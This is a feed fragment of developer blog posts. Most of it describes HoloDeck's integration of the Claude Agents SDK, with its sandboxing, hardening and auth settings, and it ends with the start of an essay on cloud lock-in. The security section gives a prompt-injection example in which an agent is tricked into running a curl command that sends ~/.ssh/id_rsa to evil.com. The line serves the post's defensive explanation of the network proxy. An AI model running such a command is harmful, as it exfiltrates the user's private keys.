&lt;li&gt;
&lt;strong&gt;Tools compose naturally&lt;/strong&gt; — multiple servers, each with their own tools&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No framework lock-in&lt;/strong&gt; — MCP is an open protocol&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Compare this to Semantic Kernel where you need to create a &lt;code&gt;KernelPlugin&lt;/code&gt;, register it with the kernel, handle the &lt;code&gt;FunctionCallContent&lt;/code&gt; types, and manage the invocation lifecycle yourself. With Claude Agents SDK, you decorate a function and you're done.&lt;/p&gt;




&lt;h2&gt;
  
  
  What's Supported Today
&lt;/h2&gt;

&lt;p&gt;As of HoloDeck v0.5.0, here's what works with &lt;code&gt;provider: anthropic&lt;/code&gt;:&lt;/p&gt;

&lt;h3&gt;
  
  
  Core Features
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;holodeck test&lt;/code&gt;&lt;/strong&gt; — Run your eval suite against Claude agents. Each test case is a stateless &lt;code&gt;invoke_once()&lt;/code&gt; call with full evaluation metrics (BLEU, ROUGE, G-Eval, RAG faithfulness, etc.)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;holodeck chat&lt;/code&gt;&lt;/strong&gt; — Interactive multi-turn chat with streaming. Token-by-token output with a spinner until the first chunk arrives. Session continuity via &lt;code&gt;session_id&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;HoloDeck tools as native Claude SDK tools&lt;/strong&gt; — VectorStoreTool and HierarchicalDocumentTool work seamlessly through the in-process MCP adapter. The agent calls them just like any other tool.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Structured outputs&lt;/strong&gt; — Configure a JSON schema (inline or file path) and the response is validated at startup &lt;em&gt;and&lt;/em&gt; at inference time. Invalid schemas fail fast.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Custom system prompts&lt;/strong&gt; — Your &lt;code&gt;instructions&lt;/code&gt; (file or inline) become the Claude subprocess's &lt;code&gt;system_prompt&lt;/code&gt;. Full control over agent behavior.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;OpenTelemetry&lt;/strong&gt; — Full observability pipeline. Traces, metrics, and logs forwarded to your OTLP collector through the OTel bridge.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;OAuth token auth&lt;/strong&gt; — Use &lt;code&gt;auth_provider: oauth_token&lt;/code&gt; for local development with your Claude Code credentials.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Claude-Specific Capabilities
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Extended thinking with configurable token budgets (1,000-100,000 tokens)&lt;/li&gt;
&lt;li&gt;Built-in web search&lt;/li&gt;
&lt;li&gt;Bash execution with excluded command lists&lt;/li&gt;
&lt;li&gt;File system access (read/write/edit individually toggleable)&lt;/li&gt;
&lt;li&gt;Subagent execution (1-16 parallel)&lt;/li&gt;
&lt;li&gt;Permission modes (&lt;code&gt;manual&lt;/code&gt;, &lt;code&gt;acceptEdits&lt;/code&gt;, &lt;code&gt;acceptAll&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Max turns limit with automatic detection&lt;/li&gt;
&lt;li&gt;5 auth providers: &lt;code&gt;api_key&lt;/code&gt;, &lt;code&gt;oauth_token&lt;/code&gt;, &lt;code&gt;bedrock&lt;/code&gt;, &lt;code&gt;vertex&lt;/code&gt;, &lt;code&gt;foundry&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Security: Sandboxing and Secure Deployment
&lt;/h2&gt;

&lt;p&gt;Here's the part where most "just use the API" agent frameworks hand-wave. Claude Agents SDK actually ships with serious, layered security — and if you're running agents that can execute bash commands and write files, you &lt;em&gt;need&lt;/em&gt; this.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Threat Model
&lt;/h3&gt;

&lt;p&gt;Agents aren't traditional software that follows predetermined code paths. They generate actions dynamically based on context. That means they can be influenced by the content they process — files, web pages, user input. This is prompt injection, and it's a real risk when your agent has bash and file access.&lt;/p&gt;

&lt;p&gt;The good news: Claude's latest models are &lt;a href="https://assets.anthropic.com/m/64823ba7485345a7/Claude-Opus-4-5-System-Card.pdf" rel="noopener noreferrer"&gt;among the most robust frontier models&lt;/a&gt; against prompt injection. But defense in depth is still good practice.&lt;/p&gt;

&lt;h3&gt;
  
  
  Built-in Sandboxing
&lt;/h3&gt;

&lt;p&gt;Claude Agents SDK includes a &lt;a href="https://code.claude.com/docs/en/sandboxing" rel="noopener noreferrer"&gt;sandboxed bash tool&lt;/a&gt; that enforces OS-level isolation — not just "we check the command string," but actual kernel-level enforcement:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;macOS&lt;/strong&gt; : Uses Apple's Seatbelt framework&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Linux&lt;/strong&gt; : Uses &lt;a href="https://github.com/containers/bubblewrap" rel="noopener noreferrer"&gt;bubblewrap&lt;/a&gt; for namespace-based isolation&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Windows (WSL2)&lt;/strong&gt;: Uses bubblewrap, same as Linux. WSL1 is &lt;em&gt;not&lt;/em&gt; supported (requires kernel features only available in WSL2). Native Windows sandboxing is planned but not yet available.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Network isolation&lt;/strong&gt; : All network access goes through a proxy — domain allowlists, not blocklists
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;┌─────────────────────────────────────────────────┐
│               Agent Sandbox                     │
│                                                 │
│ ┌─────────────────┐  ┌────────────────────────┐ │
│ │ Filesystem      │  │ Network (proxy-gated)  │ │
│ │ • CWD: r/w      │  │ • Only allowed domains │ │
│ │ • Rest: r/o     │  │ • All traffic proxied  │ │
│ │ • Denied dirs   │  │ • No direct egress     │ │
│ └─────────────────┘  └────────────────────────┘ │
│                                                 │
│ OS-level enforcement (Seatbelt / bubblewrap)    │
│ All child processes inherit restrictions        │
└─────────────────────────────────────────────────┘
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This means even if an attacker successfully injects a prompt that tricks the agent into running &lt;code&gt;curl evil.com/exfil?data=$(cat ~/.ssh/id_rsa)&lt;/code&gt;, the network proxy blocks it. The agent literally cannot reach domains that aren't on the allowlist.&lt;/p&gt;

&lt;h3&gt;
  
  
  Configuring the Sandbox Programmatically
&lt;/h3&gt;

&lt;p&gt;The SDK exposes all of this as a &lt;code&gt;SandboxSettings&lt;/code&gt; TypedDict you can pass directly in your agent options:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;from claude_code_sdk import SandboxSettings

sandbox_settings: SandboxSettings = {
    "enabled": True,
    # Auto-approve bash commands when sandboxed — no more approval fatigue
    "autoAllowBashIfSandboxed": True,
    # Commands that must run outside the sandbox (they use the normal permission flow)
    "excludedCommands": ["docker", "git push"],
    # Block the escape hatch — all commands MUST run sandboxed
    "allowUnsandboxedCommands": False,
    "network": {
        # Only these Unix sockets are accessible
        "allowUnixSockets": ["/var/run/docker.sock"],
        # Allow binding to localhost ports (for dev servers, etc.)
        "allowLocalBinding": True
    },
    # For running inside unprivileged Docker (weaker security, use with caution)
    "enableWeakerNestedSandbox": False,
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The key fields:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Field&lt;/th&gt;
&lt;th&gt;Default&lt;/th&gt;
&lt;th&gt;What it does&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;enabled&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;False&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Turn on OS-level bash sandboxing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;autoAllowBashIfSandboxed&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;True&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Skip permission prompts for sandboxed commands&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;excludedCommands&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;[]&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Commands that run outside the sandbox (e.g., &lt;code&gt;docker&lt;/code&gt;, &lt;code&gt;git&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;allowUnsandboxedCommands&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;True&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Allow &lt;code&gt;dangerouslyDisableSandbox&lt;/code&gt; escape hatch. Set to &lt;code&gt;False&lt;/code&gt; for strict mode.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;network.allowUnixSockets&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;[]&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Unix sockets accessible from within the sandbox&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;network.allowLocalBinding&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;False&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Allow processes to bind to localhost ports&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;enableWeakerNestedSandbox&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;False&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Linux-only: weaker sandbox for unprivileged Docker. Reduces security significantly.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The &lt;code&gt;autoAllowBashIfSandboxed&lt;/code&gt; flag is particularly nice for CI/CD and automated testing. Instead of the agent asking for permission on every &lt;code&gt;ls&lt;/code&gt;, &lt;code&gt;grep&lt;/code&gt;, and &lt;code&gt;cat&lt;/code&gt;, sandboxed commands just run. But if the command tries to reach a blocked domain or write outside the sandbox, it fails at the OS level — no prompt needed, just a hard block.&lt;/p&gt;

&lt;p&gt;Setting &lt;code&gt;allowUnsandboxedCommands: False&lt;/code&gt; is the strict mode. It completely disables the &lt;code&gt;dangerouslyDisableSandbox&lt;/code&gt; escape hatch, forcing every bash command to run inside the sandbox. Combined with &lt;code&gt;excludedCommands&lt;/code&gt; for the handful of tools that genuinely can't be sandboxed (like Docker), this gives you a tight security posture.&lt;/p&gt;

&lt;h3&gt;
  
  
  Production Hardening
&lt;/h3&gt;

&lt;p&gt;For production deployments, Anthropic's &lt;a href="https://platform.claude.com/docs/en/agent-sdk/secure-deployment" rel="noopener noreferrer"&gt;secure deployment guide&lt;/a&gt; lays out a serious defense-in-depth strategy:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Container isolation with zero network:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;docker run \
  --cap-drop ALL \
  --security-opt no-new-privileges \
  --read-only \
  --network none \
  --memory 2g \
  --pids-limit 100 \
  --user 1000:1000 \
  -v /path/to/code:/workspace:ro \
  -v /var/run/proxy.sock:/var/run/proxy.sock:ro \
  agent-image

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;--network none&lt;/code&gt; flag removes &lt;em&gt;all&lt;/em&gt; network interfaces. The only way out is through a Unix socket connected to a proxy running on the host. That proxy enforces domain allowlists, injects credentials, and logs everything.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The proxy pattern for credentials&lt;/strong&gt; is particularly elegant. Instead of giving the agent an API key, you run a proxy outside the agent's security boundary that injects credentials into outgoing requests. The agent makes requests without credentials → the proxy adds them → forwards to the destination. The agent never sees the actual secrets.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Isolation technology options:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Technology&lt;/th&gt;
&lt;th&gt;Isolation Strength&lt;/th&gt;
&lt;th&gt;Overhead&lt;/th&gt;
&lt;th&gt;Use Case&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Sandbox runtime&lt;/td&gt;
&lt;td&gt;Good&lt;/td&gt;
&lt;td&gt;Very low&lt;/td&gt;
&lt;td&gt;Local dev, CI/CD&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Docker + &lt;code&gt;--network none&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Setup dependent&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;Standard deployment&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;gVisor (&lt;code&gt;runsc&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;Excellent&lt;/td&gt;
&lt;td&gt;Medium-High&lt;/td&gt;
&lt;td&gt;Multi-tenant, untrusted content&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Firecracker VMs&lt;/td&gt;
&lt;td&gt;Excellent&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;td&gt;Maximum isolation&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  What HoloDeck Does Today
&lt;/h3&gt;

&lt;p&gt;HoloDeck's &lt;code&gt;ClaudeBackend&lt;/code&gt; already implements several security practices:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Pre-flight validators&lt;/strong&gt; catch misconfigurations before the subprocess starts (missing Node.js, invalid credentials, embedding provider mismatches, working directory collisions with existing &lt;code&gt;CLAUDE.md&lt;/code&gt; files)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Credential injection&lt;/strong&gt; via subprocess env vars — auth tokens are scoped to the subprocess, not global&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Permission mode mapping&lt;/strong&gt; — &lt;code&gt;acceptEdits&lt;/code&gt; and &lt;code&gt;acceptAll&lt;/code&gt; are escalated to &lt;code&gt;bypassPermissions&lt;/code&gt; only in &lt;code&gt;test&lt;/code&gt; mode (non-interactive automation). In &lt;code&gt;chat&lt;/code&gt; mode, the configured permission level is respected.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tool allowlists&lt;/strong&gt; via &lt;code&gt;claude.allowed_tools&lt;/code&gt; — explicitly restrict which MCP tools the agent can invoke&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The sandboxing and proxy patterns from the SDK docs will naturally compose with HoloDeck's deployment pipeline (&lt;code&gt;holodeck deploy&lt;/code&gt;) once we add Claude backend support to &lt;code&gt;holodeck serve&lt;/code&gt;.&lt;/p&gt;




&lt;h2&gt;
  
  
  Using Claude Agents SDK Without an Anthropic API Key
&lt;/h2&gt;

&lt;p&gt;Here's something most people don't realize: the Claude Agents SDK doesn't &lt;em&gt;have&lt;/em&gt; to talk to Anthropic's servers. It speaks the Anthropic API protocol, and any endpoint that implements that protocol works. Ollama does exactly this — it exposes an &lt;strong&gt;Anthropic-compatible&lt;/strong&gt; endpoint that the SDK can talk to natively.&lt;/p&gt;

&lt;p&gt;As documented in the &lt;a href="https://docs.ollama.com/integrations/claude-code" rel="noopener noreferrer"&gt;Ollama integration guide&lt;/a&gt;, you can point the SDK at a local Ollama instance by setting &lt;code&gt;ANTHROPIC_BASE_URL&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;export ANTHROPIC_BASE_URL=http://localhost:11434

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;To be clear: the SDK does &lt;strong&gt;not&lt;/strong&gt; support OpenAI-compatible endpoints. It speaks the Anthropic Messages API. Ollama works because Ollama implemented the Anthropic API format on their side. Any provider that does the same (or any proxy that translates to it) will work too.&lt;/p&gt;

&lt;p&gt;This means you can experiment with the Claude Agents SDK tooling, MCP integration, and agent patterns using local models — completely free, completely offline. The SDK's tool-calling loop, structured output, and session management all work the same way regardless of what's behind the endpoint.&lt;/p&gt;

&lt;p&gt;Obviously you won't get Claude-level reasoning from a local 7B model, but for testing tool integration, MCP server development, and agent workflow design, it's perfectly usable.&lt;/p&gt;




&lt;h2&gt;
  
  
  Auth: Local Experimentation vs Production
&lt;/h2&gt;

&lt;p&gt;One of the friction points with agent SDKs is authentication. Claude Agents SDK makes this surprisingly painless for local development.&lt;/p&gt;

&lt;p&gt;As &lt;a href="https://x.com/trq212/status/2024212378402095389?s=20" rel="noopener noreferrer"&gt;Thariq pointed out on X&lt;/a&gt;, using your &lt;code&gt;CLAUDE_CODE_OAUTH_TOKEN&lt;/code&gt; for local experimentation is actually allowed. This means if you have Claude Code installed and authenticated, you can build and test custom agents without setting up a separate API key.&lt;/p&gt;

&lt;p&gt;In HoloDeck, this is a simple YAML toggle:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;model:
  provider: anthropic
  name: claude-sonnet-4-20250514
  auth_provider: oauth_token # Uses CLAUDE_CODE_OAUTH_TOKEN

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;However&lt;/strong&gt; — and this is important — &lt;strong&gt;when you ship these agents to production, you must use an Anthropic API key.&lt;/strong&gt; The OAuth token is tied to your personal Claude Code session. It's not meant for server-side deployment.&lt;/p&gt;

&lt;p&gt;For production:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;model:
  provider: anthropic
  name: claude-sonnet-4-20250514
  auth_provider: api_key # Uses ANTHROPIC_API_KEY

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Or if you're running through a cloud provider:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;model:
  provider: anthropic
  name: claude-sonnet-4-20250514
  auth_provider: bedrock # or vertex, foundry

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;HoloDeck's validators check for the right credentials at startup and inject them into the subprocess environment, so you get a clear error if something's misconfigured rather than a cryptic 401 at inference time.&lt;/p&gt;




&lt;h2&gt;
  
  
  What's Coming Next
&lt;/h2&gt;

&lt;p&gt;HoloDeck v0.5.0 is the foundation. Here's what we're building on top of it:&lt;/p&gt;

&lt;h3&gt;
  
  
  Hooks
&lt;/h3&gt;

&lt;p&gt;Claude Agents SDK supports &lt;a href="https://docs.anthropic.com/en/docs/agents-and-tools/claude-code/hooks" rel="noopener noreferrer"&gt;hooks&lt;/a&gt; — shell commands that execute in response to agent events (tool calls, message sends, etc.). We'll expose these as YAML config so you can add pre/post processing, logging, or validation to any agent action without writing code.&lt;/p&gt;

&lt;h3&gt;
  
  
  Agent Skills
&lt;/h3&gt;

&lt;p&gt;Skills are reusable prompt-based capabilities that can be invoked by name. Think of them as composable building blocks — a "summarize" skill, a "code-review" skill, a "translate" skill — that agents can mix and match.&lt;/p&gt;

&lt;h3&gt;
  
  
  Subagents (Multi-Agent Swarms)
&lt;/h3&gt;

&lt;p&gt;The SDK already supports parallel subagent execution. We'll expose this as a YAML pattern where you define a coordinator agent that spawns specialized worker agents. Swarm-style orchestration, configured in YAML.&lt;/p&gt;

&lt;h3&gt;
  
  
  &lt;code&gt;holodeck serve&lt;/code&gt; for Claude Agents
&lt;/h3&gt;

&lt;p&gt;Right now, &lt;code&gt;holodeck serve&lt;/code&gt; only works with Semantic Kernel backends. We're adding Claude agent support so you can expose any &lt;code&gt;provider: anthropic&lt;/code&gt; agent as an HTTP API endpoint — same REST interface, same AG-UI compliance.&lt;/p&gt;

&lt;h3&gt;
  
  
  &lt;code&gt;holodeck deploy&lt;/code&gt; with Claude
&lt;/h3&gt;

&lt;p&gt;Once &lt;code&gt;serve&lt;/code&gt; supports Claude, &lt;code&gt;deploy&lt;/code&gt; naturally follows. The deployment pipeline (Dockerfile generation, container build, cloud push) will use &lt;code&gt;serve&lt;/code&gt; as the entrypoint into the container. You just swap the provider in your YAML and the container runs a Claude agent instead of an SK agent — with all the security hardening options from the SDK baked in.&lt;/p&gt;

&lt;h3&gt;
  
  
  Human-in-the-Loop Approvals
&lt;/h3&gt;

&lt;p&gt;By combining &lt;code&gt;permission_mode: manual&lt;/code&gt; (or &lt;code&gt;acceptEdits&lt;/code&gt;) with hooks, you can build approval workflows where the agent pauses and waits for human confirmation before taking sensitive actions. Think: "the agent wants to run &lt;code&gt;DELETE FROM users&lt;/code&gt; — approve or deny?"&lt;/p&gt;

&lt;h3&gt;
  
  
  Custom Anthropic Endpoints
&lt;/h3&gt;

&lt;p&gt;Full support for routing through cloud providers — AWS Bedrock, Google Vertex AI, Azure Foundry — plus custom &lt;code&gt;ANTHROPIC_BASE_URL&lt;/code&gt; for self-hosted endpoints and Ollama. Run the same agent YAML against any compatible backend.&lt;/p&gt;




&lt;h2&gt;
  
  
  Wrapping Up
&lt;/h2&gt;

&lt;p&gt;I started building HoloDeck as a multi-backend platform because I thought you needed choice. And you do — for the transition period. But after building the Claude Agents SDK integration, I'm increasingly convinced it's the only agent runtime most teams need.&lt;/p&gt;

&lt;p&gt;It's a process, not a library. It manages its own tool loop. It speaks MCP natively. It has bash, file I/O, extended thinking, structured output, and subagents built in. It ships with real sandboxing — OS-level enforcement, not just string matching on commands. And you can &lt;a href="https://docs.ollama.com/integrations/claude-code" rel="noopener noreferrer"&gt;run it locally with Ollama&lt;/a&gt; if you want to experiment without an API key.&lt;/p&gt;

&lt;p&gt;The Semantic Kernel backend isn't going anywhere — it powers OpenAI and Azure workloads and that's still valuable. But for new agents? I'd start with Claude Agents SDK every time.&lt;/p&gt;

&lt;p&gt;If you're building agents today, stop gluing together LangChain chains or wrestling with AutoGen graphs. Just define your agent in YAML, point it at Claude, and let the SDK do what it does best.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;name: my-agent
model:
  provider: anthropic
  name: claude-sonnet-4-20250514
  auth_provider: oauth_token
instructions:
  inline: "You are a helpful assistant."
claude:
  bash:
    enabled: true
  file_system:
    read: true
    write: true
  max_turns: 10

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That's it. That's the whole framework.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Check out &lt;a href="https://github.com/justinbarias/holodeck" rel="noopener noreferrer"&gt;HoloDeck on GitHub&lt;/a&gt; and the &lt;a href="https://platform.claude.com/docs/en/agent-sdk/overview" rel="noopener noreferrer"&gt;Claude Agent SDK docs&lt;/a&gt; to get started.&lt;/em&gt;&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Take Back the Stack. Your Cloud Provider Doesn't Want You To.</title>
      <dc:creator>Jeremiah Justin Barias</dc:creator>
      <pubDate>Sun, 08 Feb 2026 00:00:00 +0000</pubDate>
      <link>https://dev.to/jeremiahbarias/take-back-the-stack-your-cloud-provider-doesnt-want-you-to-144h</link>
      <guid>https://dev.to/jeremiahbarias/take-back-the-stack-your-cloud-provider-doesnt-want-you-to-144h</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe6vb6ecbzwumwcq6bsek.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe6vb6ecbzwumwcq6bsek.jpg" alt=" " width="800" height="533"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h1&gt;
  
  
  Take Back the Stack. Your Cloud Provider Doesn't Want You To.
&lt;/h1&gt;




&lt;p&gt;For the better part of a decade, I've watched organisations — hand over layer after layer of their engineering stack to cloud providers. And every single time, the justification was the same: "We don't have the skills to build this ourselves." Infrastructure? Outsource it. Platforms? Managed service. Data pipelines? Let AWS handle it. ML? Definitely outsource that.&lt;/p&gt;

&lt;p&gt;And now it's happening again with AI agents. Azure has AI Foundry. AWS has Bedrock and AgentCore. Google has Vertex AI Engine. The pitch is identical to every pitch before it: "Don't build this. Consume ours. We'll handle the hard parts."&lt;/p&gt;

&lt;p&gt;I'm tired of it. And for the first time, I think the excuse — "we can't build it ourselves" — is actually, provably, &lt;em&gt;wrong&lt;/em&gt;.&lt;/p&gt;




&lt;h2&gt;
  
  
  How We Got Here
&lt;/h2&gt;

&lt;p&gt;I get it. The outsourcing made sense for a long time. Running data centres was expensive and painful. Managing Kubernetes at scale required a team most organisations couldn't hire. Building ML pipelines from scratch was a PhD-level exercise.&lt;/p&gt;

&lt;p&gt;So we moved to the cloud. Then we moved to managed services on the cloud. Then we moved to managed AI services on the cloud. Each step was rational. Each step also meant we understood less and less about our own systems.&lt;/p&gt;

&lt;p&gt;The progression looked something like:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"We can't run data centres." Fair enough. "We can't manage Kubernetes." OK, sure. "We can't build ML pipelines." Debatable, but fine. "We can't build AI agents." Hang on.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;That last one is where I draw the line. Because the thing that changed — the thing that most organisations haven't fully clocked yet — is that building software just got mass-democratised in a way that makes most of those "we can't" excuses evaporate.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Agent Platform Gold Rush (And Why You Should Be Suspicious)
&lt;/h2&gt;

&lt;p&gt;Every major cloud provider is now racing to become the platform where your AI agents live. Let me spell out what that actually means.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Azure AI Foundry&lt;/strong&gt; — model catalogue, prompt management, agent orchestration, evaluation tooling. All inside Azure. All wired into Azure services. All making it progressively harder to leave Azure.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;AWS Bedrock AgentCore&lt;/strong&gt; — same play, different logo. Build your agents on AWS, connect them to your AWS data, orchestrate them with AWS primitives. Your agents become structurally dependent on AWS. That's not a bug; that's their business model.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Google Vertex AI Engine&lt;/strong&gt; — you see where this is going.&lt;/p&gt;

&lt;p&gt;Here's what bugs me. These aren't just hosting platforms. They're becoming the &lt;em&gt;control plane&lt;/em&gt; for your AI strategy. They decide what models you can use, how your agents are orchestrated, what telemetry you get, how your data flows. And once you've wired fifty agents into their proprietary service mesh, your switching costs aren't just high — they're existential.&lt;/p&gt;

&lt;p&gt;For a startup? Fine. Use the managed thing. Ship fast, worry about lock-in later. But if you're a large enterprise, a government agency, any organisation where your value comes from the systems you build and the data you hold — you're handing over the keys. Again.&lt;/p&gt;

&lt;p&gt;For organisations that need to meet regulatory requirements, and government institutions that need to consider who their service providers are -- &lt;strong&gt;THIS IS A MATERIAL RISK&lt;/strong&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Something Changed and Most People Missed It
&lt;/h2&gt;

&lt;p&gt;While the cloud providers were building their agent hosting empires, something happened that completely rewrites the economics here.&lt;/p&gt;

&lt;p&gt;Claude Code. Codex. Cursor. Cline. Aider. Pick your flavour.&lt;/p&gt;

&lt;p&gt;These aren't your 2023 Copilot autocomplete toys. These are agentic coding assistants that &lt;em&gt;build entire systems&lt;/em&gt;. They reason about architecture. They scaffold applications. They debug, refactor, write tests, and iterate across entire codebases. I've been using Claude Code daily for months and it still catches me off guard how much it can do.&lt;/p&gt;

&lt;p&gt;Tasks that would've taken me a week — standing up a new service, wiring an API integration, building a deployment pipeline — now take an afternoon. Not because I'm cutting corners. Because the AI is doing 80% of the mechanical work and I'm doing the 20% that actually requires a brain: the architecture decisions, the domain logic, the "wait, that edge case will blow up in production" judgment calls.&lt;/p&gt;

&lt;p&gt;And this is the part that matters: &lt;strong&gt;the reason we outsourced all those engineering layers was because building them in-house was expensive.&lt;/strong&gt; You needed big teams. Deep expertise across a dozen domains. Months of runway.&lt;/p&gt;

&lt;p&gt;What if that's not true anymore?&lt;/p&gt;

&lt;h2&gt;
  
  
  You Don't Need a 10x Team. You Might Need Three People.
&lt;/h2&gt;

&lt;p&gt;I'm going to say something that'll annoy some people: the era of needing ten-person platform teams to build internal tooling is over. Or at the very least, the bar has dropped &lt;em&gt;dramatically&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;A single engineer who knows their domain and knows how to drive an AI coding assistant can now:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Scaffold infrastructure-as-code for an entire deployment pipeline in a day&lt;/li&gt;
&lt;li&gt;Build a custom agent orchestration layer that's tailored to your actual needs&lt;/li&gt;
